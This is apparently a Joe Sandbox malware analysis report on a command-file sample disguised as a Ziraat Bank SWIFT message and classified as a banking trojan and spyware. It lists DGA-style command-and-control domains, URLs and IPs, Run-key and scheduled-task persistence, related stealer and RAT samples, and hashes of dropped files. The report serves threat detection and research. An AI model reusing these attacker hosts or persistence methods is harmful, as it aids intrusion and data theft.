                                                                                                                    47.129.31.212
                                                                                                                    truefalse
                                                                                                                      high
                                                                                                                      aatcwo.biz
                                                                                                                      47.129.31.212
                                                                                                                      truefalse
                                                                                                                        high
                                                                                                                        uphca.biz
                                                                                                                        44.221.84.105
                                                                                                                        truefalse
                                                                                                                          high
                                                                                                                          htwqzczce.biz
                                                                                                                          172.234.222.143
                                                                                                                          truefalse
                                                                                                                            high
                                                                                                                            xyrgy.biz
                                                                                                                            18.208.156.248
                                                                                                                            truefalse
                                                                                                                              high
                                                                                                                              banwyw.biz
                                                                                                                              44.221.84.105
                                                                                                                              truefalse
                                                                                                                                high
                                                                                                                                myups.biz
                                                                                                                                165.160.13.20
                                                                                                                                truefalse
                                                                                                                                  high
                                                                                                                                  pwlqfu.biz
                                                                                                                                  34.246.200.160
                                                                                                                                  truefalse
                                                                                                                                    high
                                                                                                                                    zyiexezl.biz
                                                                                                                                    18.208.156.248
                                                                                                                                    truefalse
                                                                                                                                      high
                                                                                                                                      hlzfuyy.biz
                                                                                                                                      34.211.97.45
                                                                                                                                      truefalse
                                                                                                                                        high
                                                                                                                                        ssbzmoy.biz
                                                                                                                                        18.141.10.107
                                                                                                                                        truefalse
                                                                                                                                          high
                                                                                                                                          knjghuig.biz
                                                                                                                                          18.141.10.107
                                                                                                                                          truefalse
                                                                                                                                            high
                                                                                                                                            yunalwv.biz
                                                                                                                                            208.100.26.245
                                                                                                                                            truefalse
                                                                                                                                              high
                                                                                                                                              brsua.biz
                                                                                                                                              3.254.94.185
                                                                                                                                              truefalse
                                                                                                                                                high
                                                                                                                                                mgmsclkyu.biz
                                                                                                                                                34.246.200.160
                                                                                                                                                truefalse
                                                                                                                                                  high
                                                                                                                                                  cpclnad.biz
                                                                                                                                                  44.221.84.105
                                                                                                                                                  truefalse
                                                                                                                                                    high
                                                                                                                                                    ptrim.biz
                                                                                                                                                    18.141.10.107
                                                                                                                                                    truefalse
                                                                                                                                                      high
                                                                                                                                                      ihcnogskt.biz
                                                                                                                                                      35.164.78.200
                                                                                                                                                      truefalse
                                                                                                                                                        high
                                                                                                                                                        qpnczch.biz
                                                                                                                                                        18.246.231.120
                                                                                                                                                        truefalse
                                                                                                                                                          high
                                                                                                                                                          mnjmhp.biz
                                                                                                                                                          47.129.31.212
                                                                                                                                                          truefalse
                                                                                                                                                            high
                                                                                                                                                            acwjcqqv.biz
                                                                                                                                                            18.141.10.107
                                                                                                                                                            truefalse
                                                                                                                                                              high
                                                                                                                                                              zrlssa.biz
                                                                                                                                                              44.221.84.105
                                                                                                                                                              truefalse
                                                                                                                                                                high
                                                                                                                                                                pywolwnvd.biz
                                                                                                                                                                54.244.188.177
                                                                                                                                                                truefalse
                                                                                                                                                                  high
                                                                                                                                                                  mjheo.biz
                                                                                                                                                                  44.221.84.105
                                                                                                                                                                  truefalse
                                                                                                                                                                    high
                                                                                                                                                                    lrxdmhrr.biz
                                                                                                                                                                    54.244.188.177
                                                                                                                                                                    truefalse
                                                                                                                                                                      high
                                                                                                                                                                      vrrazpdh.biz
Name | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                                                                                                                                            http://nqwjmb.biz/ufwhufalse
                                                                                                                                                                                                                                                                                                                              http://xlfhhhm.biz/wjfalse
                                                                                                                                                                                                                                                                                                                                http://jlqltsjvh.biz/jvecbpfalse
                                                                                                                                                                                                                                                                                                                                  http://knjghuig.biz/xyuwwggfofalse
                                                                                                                                                                                                                                                                                                                                    http://dwrqljrr.biz/xubhwtrue
                                                                                                                                                                                                                                                                                                                                      https://gxe0.com/yak2/233_Juqmtmyadyytrue
                                                                                                                                                                                                                                                                                                                                        http://hehckyov.biz/sdgvcmfofalse
                                                                                                                                                                                                                                                                                                                                          http://hagujcj.biz/rqtfalse
                                                                                                                                                                                                                                                                                                                                            http://lpuegx.biz/frjrhbtrue
                                                                                                                                                                                                                                                                                                                                              https://api.ipify.org/false
                                                                                                                                                                                                                                                                                                                                                http://qvuhsaqa.biz/nfbfdhwgbtrue
                                                                                                                                                                                                                                                                                                                                                  http://vjaxhpbji.biz/pjqqchtrue
                                                                                                                                                                                                                                                                                                                                                    http://brsua.biz/fflfjsnvrvmguebcfalse
                                                                                                                                                                                                                                                                                                                                                      http://fwiwk.biz/sycehlfxifnifalse
                                                                                                                                                                                                                                                                                                                                                        http://napws.biz/fhfpwltbvvfalse
                                                                                                                                                                                                                                                                                                                                                          http://dyjdrp.biz/shrtrue
                                                                                                                                                                                                                                                                                                                                                            http://cvgrf.biz/iwtyrexjutrue
                                                                                                                                                                                                                                                                                                                                                              http://mjheo.biz/lelrjltwmlswdfalse
                                                                                                                                                                                                                                                                                                                                                                http://ftxlah.biz/pnuofhgyvsfalse
                                                                                                                                                                                                                                                                                                                                                                  http://ijnmvqa.biz/swkrgjmrquigfalse
                                                                                                                                                                                                                                                                                                                                                                    http://dwrqljrr.biz/pgswneolngwqmbmatrue
                                                                                                                                                                                                                                                                                                                                                                      http://nlscndwp.biz/xkblisebtrue
                                                                                                                                                                                                                                                                                                                                                                        http://krnsmlmvd.biz/frfalse
                                                                                                                                                                                                                                                                                                                                                                          http://acwjcqqv.biz/obyashlqvnfalse
                                                                                                                                                                                                                                                                                                                                                                            http://zrlssa.biz/lspnhjimgtskiesmfalse
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                                                                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                                                                                                                                                                                                                    127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557464
Start date and time: 2024-11-18 09:55:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 15m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
                                                                                                                                                                                                                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                                                                                                                    Number of analysed new started processes analysed:45
                                                                                                                                                                                                                                                                                                                                                                                                                                    Number of new started drivers analysed:3
                                                                                                                                                                                                                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                                                                                                                    Sample name:Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                                                                                                                                                                                                                    Classification:mal100.spre.bank.troj.spyw.evad.winCMD@66/168@302/23
                                                                                                                                                                                                                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Number of executed functions: 61
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Number of non-executed functions: 208
                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Found application associated with file extension: .cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                                    • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • VT rate limit hit for: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
Time      Type             Description
03:56:10  API Interceptor  2x Sleep call for process: AnyDesk.PIF modified
05:01:15  API Interceptor  144x Sleep call for process: alg.exe modified
05:01:16  API Interceptor  27x Sleep call for process: powershell.exe modified
05:01:18  API Interceptor  169x Sleep call for process: Native_neworigin.exe modified
05:01:24  API Interceptor  1x Sleep call for process: Juqmtmya.PIF modified
05:01:25  API Interceptor  8x Sleep call for process: aymtmquJ.pif modified
11:01:13  Task Scheduler   Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
11:01:13  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
11:01:23  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
11:01:33  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
Match         Associated Sample Name / URL  Detection  Threat Name                                Context
3.254.94.185  AENiBH7X1q.exe                malicious  PureLog Stealer, RedLine                   • ocsvqjg.biz/cm
3.254.94.185  E_dekont.cmd                  malicious  DBatLoader, Nitol, PureLog Stealer, XWorm  • uaafd.biz/byhbnbikqcomemw
3.254.94.185  Y2EM7suNV5.exe                malicious  MassLogger RAT                             • ocsvqjg.biz/llnmgshpkylde
3.254.94.185  AsusSetup.exe                 malicious  Unknown                                    • ocsvqjg.biz/jw
3.254.94.185  SetupRST.exe                  malicious  Unknown                                    • ocsvqjg.biz/xrujxccjxeybqwu
3.254.94.185  AsusSetup.exe                 malicious  Unknown                                    • ocsvqjg.biz/cly
                                                                                                                                                                                                                                                                                                                                                                                                                                    PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • brsua.biz/rmsexfnebpnpl
                                                                                                                                                                                                                                                                                                                                                                                                                                    PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • ocsvqjg.biz/plbdbgmplm
                                                                                                                                                                                                                                                                                                                                                                                                                                    nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • uaafd.biz/inbwfclciwgycy
                                                                                                                                                                                                                                                                                                                                                                                                                                    tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • uaafd.biz/flkouthsl
                                                                                                                                                                                                                                                                                                                                                                                                                                    3.94.10.348dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lygynud.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lygynud.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lymyxid.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lymyxid.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lymyxid.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lygynud.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lygynud.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lygynud.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lymyxid.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lymyxid.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                                                                                                                    nlscndwp.bizE_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                    nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                    tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                    TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBook, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                    vjaxhpbji.bizAENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    xnxvnn.bizE_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                                                                                                                                                                                                    No context
Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1353216
Entropy (8bit): 5.324391345568456
Encrypted: false
SSDEEP: 12288:LC4VQjGARQNhiGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:LOCAR0iGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:ACF96EE843E48D0B024E2B4A892AC0CA
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3F33E9FB22E55C31C042D38F16FEE6FD6504724F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7B5A1DB9D72A62A6759DC287E8DE7BC8F23E0679262EEDCCA84D81E5CB69CD89
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9879878C9724150F72FEAF5BB8238266C12B615AEFC64381AD0E762B427CB40543A3581D8FBEBA0C8FF8A633913F7A06E12F2EE7C129BC1BF559EC0B871635D5
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1294848
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.282705400499314
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:DNUpaKghVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:DCMKgHsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3D98066AD6AEAE4B668ABF7FFB2850F5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5588BF4216A491FBD460AD8C912CDA7AE3AA81A3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D3CF43B0696E95DB8226919BE0E1FD2D71366AA7F94FCD84C39EC5AF0F2FBF97
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FCF8B080BDF1B63C2072A7DED5EC8927C99364EA4B4B35309FED8B3879106BF0F044771806E491240FFB8FA789AE9C2DF73D5F3C1F204A7EDD1C08FAA9E21944
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1314304
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.274148457091755
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:FMEhwdbTiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:jKdHisqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4FFC8F29FE055E7C047B8113F7D55A34
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1AC8162DA5810D7A878879FAB7C31F573CFA3A65
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D3403F223C09D2CEF8C3EBFFA9948100AB50561DF9B9195EE5D7420FA53A55DE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6AF8DC435603314C4D4B2FB3B5DBB0E32EE8A684BE74367D532E56A6313DACAB103CE082119E1855CFCA5E838CC457C66190AE7FDFBD7432BC82E8BA8D24103F
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.64703754259372
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:KK0eqkSR7Xgo4TiRPnLWvJ+Dmg27RnWGj:KK0pR7Xn4TiRCvJ+D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9270EACCEDA21F19CB9C60CFDB38F907
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6FB8814BE45CD290E5F877640FEF2386991C0CEE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8742DDA331826FE01F2FE90E8EEF44DDCA3A1276F2949D182FD8ED3131AF9DFD
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:92A570A2171739B0C41373D2ACF1B63F1D34857D07975242B7E2B9C422BE843E5CB1E26378A2B5C4DD6582F0B4D8730D0340D957F3BC8CED558A5731CE70CA27
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.565058999526638
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:/fYP1JsEDkSR7Xgo4TiRPnLWvJ+Dmg27RnWGj:3YPBR7Xn4TiRCvJ+D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6E5C263F060D9923598D43BA43C62549
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0CB24F9BCD1D265B173B7E36FFA2191CBAE5253D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:98E74D41001B855AF8AEBBAA964902FB2F78E15F97ABB2CFA144B8E3D0E06934
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B4841FA202BA73D8D7C6F349007CD2A143061C1EF34F180671CC352343FEC1ABBC0E99ECFEE5FC7798F4FD7BAE964A023ADE77ED09FFD3DDFEE65758949E56FD
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1245184
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1235717355783335
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:T62SYUcknnYXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:YYUcknYsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CE356AD8D8D5C5C962095A8A77EDDA28
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:43544F870B3C346582CEE0159EE4D7400DD03707
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C8410B8F77F9B58E6F3A45ED9550C03767F98B6767A97706AFA7DCA46F8B6B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3FD3877C55872A723C6C9318277B5CCCE873042A8D7D6D201E3EA194E50DCA96A4DD677E0C8511268021BDF4C5FFEB323DCA65CEB820D1EA933FFF79F90DE060
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.166672796290831
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:d+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSCDmg27RnWGj:vSktbpED527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7E1E764F744FDE8FB4FBD1990DA14C3C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:59FC567D4D92B83BF7868A3433609ADCFCA4C29A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F51F294C0E7B4107488689C47B21E1635F3F038D37D47AEC65C087953D6A6B3D
